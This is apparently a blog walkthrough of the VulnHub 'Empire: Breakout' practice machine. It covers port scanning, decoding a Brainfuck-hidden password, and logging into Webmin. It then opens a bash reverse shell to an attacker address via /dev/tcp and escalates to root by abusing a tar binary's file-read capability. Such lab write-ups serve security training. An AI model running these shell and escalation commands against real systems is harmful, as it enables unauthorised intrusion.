VulnHub: Empire: Breakout

Today we will take a look at Vulnhub: Breakout. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC --open 192.168.0.109PORT      STATE SERVICE     VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
  • Enum4linux

Command: enum4linux -a 192.168.0.109

We found a username here

  • Web

If we look at the bottom of the page’s source code, we see a text encrypted by the brainfuck algorithm.

view-source:http://192.168.0.109/

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

If we decode, we get the password.

.2uqPEfj3D<P'a-3
  • Reverse Shell

When we look at port 20000, it redirects us to the admin panel with a link

https://192.168.0.109:20000/

Username: cyberPassword: .2uqPEfj3D<P'a-3

Once logged in, there is a terminal icon on the bottom left. With its we can carry out orders. I’ll get a reverse shell.

bash -i >& /dev/tcp/YourIP/1234 0>&1
  • Root

Command: getcap -r / 2>/dev/null

/home/cyber/tar cap_dac_read_search=ep
cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bakcyber@breakout:~$ ./tar -xvf old_passcyber@breakout:~$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~$ su root

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Agility Under Uncertainty

What is Web Scraping?

How to cache your Personal Access Token (PAT) in Linux environment

Daily Code Reviews as a workflow

Getting started with Raspberry Pi Camera

1 new photos on my Flickr!

Which Is The Best Method To Extract The Data — Web Scraping Vs. API?

5 Best Courses to learn Google Cloud Platform (GCP) in 2022

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

OverTheWire:~$ Bandit Level 13 → 14

Metasploit: Introduction

MHSCTF 2022 — Avengers Assemble (Reverse Engineering)

TryHackMe Pickle Rick CTF